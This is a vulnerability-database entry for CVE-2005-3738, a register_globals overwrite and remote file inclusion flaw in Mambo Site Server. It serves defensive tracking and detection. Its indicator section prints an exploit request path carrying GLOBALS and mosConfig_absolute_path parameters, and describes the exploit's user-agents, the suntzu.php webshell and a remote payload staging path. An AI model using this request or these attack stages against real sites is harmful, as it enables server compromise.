CVE-2005-3738
published 2005-11-22CVE-2005-3738: globals.php in Mambo Site Server 4.0.14 and earlier, when register_globals is disabled, allows remote attackers to overwrite variables in the GLOBALS array and…
PriorityP260low2.6CVSS 2.0
AVNACHAuNCNIPAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
3.56%
87.9th percentile
globals.php in Mambo Site Server 4.0.14 and earlier, when register_globals is disabled, allows remote attackers to overwrite variables in the GLOBALS array and conduct various attacks, as demonstrated using the mosConfig_absolute_path parameter to content.html.php for remote PHP file inclusion.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
pathindex.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=↗
- →Detect exploitation attempts by looking for HTTP GET requests to index.php containing both 'GLOBALS=' and 'mosConfig_absolute_path=' parameters simultaneously, which is the hallmark of the globals overwrite attack vector. ↗
- →Alert on HTTP requests containing the User-Agent string 'NeuralBot/0.2', used in the first stage of the exploit to trigger remote file inclusion via mosConfig_absolute_path. ↗
- →Alert on HTTP requests containing the User-Agent string 'S.T.A.L.K.E.R.', used in the second stage of the exploit to execute commands via the dropped webshell (suntzu.php). ↗
- →Detect presence of the dropped webshell by monitoring for HTTP requests to 'suntzu.php' with a 'cmd=' query parameter, indicating post-exploitation command execution. ↗
- →The exploit checks for the string 'Hi Master' in the HTTP response to confirm successful exploitation; monitor web server responses for this string as a post-exploitation indicator. ↗
- →The attacker stages a PHP payload at a remote location under /includes/HTML_toolbar.php/index.html; monitor outbound HTTP requests from the web server to external hosts fetching this path. ↗
- ·The vulnerability is only exploitable when PHP's register_globals is DISABLED; with register_globals enabled, the GLOBALS array overwrite via GET/POST parameters is not possible through this vector. ↗
CVSS provenance
nvdv2.02.6LOWAV:N/AC:H/Au:N/C:N/I:P/A:N
vulncheck2.6LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qg6h-2v97-496v: globals
ghsa_unreviewed·2022-05-01
CVE-2005-3738 [LOW] GHSA-qg6h-2v97-496v: globals
globals.php in Mambo Site Server 4.0.14 and earlier, when register_globals is disabled, allows remote attackers to overwrite variables in the GLOBALS array and conduct various attacks, as demonstrated using the mosConfig_absolute_path parameter to content.html.php for remote PHP file inclusion.
VulnCheck
mambo mambo_site_server Improper Control of Generation of Code ('Code Injection')
vulncheck·2005·CVSS 2.6
CVE-2005-3738 [LOW] mambo mambo_site_server Improper Control of Generation of Code ('Code Injection')
mambo mambo_site_server Improper Control of Generation of Code ('Code Injection')
globals.php in Mambo Site Server 4.0.14 and earlier, when register_globals is disabled, allows remote attackers to overwrite variables in the GLOBALS array and conduct various attacks, as demonstrated using the mosConfig_absolute_path parameter to content.html.php for remote PHP file inclusion.
Affected: mambo mambo_site_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2005-3738
No detection rules found.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.htmlhttp://forum.mamboserver.com/showthread.php?t=66154http://secunia.com/advisories/17622http://securitytracker.com/id?1015258http://www.securityfocus.com/archive/1/417215http://www.securityfocus.com/archive/1/426942/100/0/threadedhttp://www.securityfocus.com/archive/1/427196/100/0/threadedhttp://www.securityfocus.com/bid/15461http://www.vupen.com/english/advisories/2005/2473http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.htmlhttp://forum.mamboserver.com/showthread.php?t=66154http://secunia.com/advisories/17622http://securitytracker.com/id?1015258http://www.securityfocus.com/archive/1/417215http://www.securityfocus.com/archive/1/426942/100/0/threadedhttp://www.securityfocus.com/archive/1/427196/100/0/threadedhttp://www.securityfocus.com/bid/15461http://www.vupen.com/english/advisories/2005/2473
2005-11-22
Published
Exploited in the wild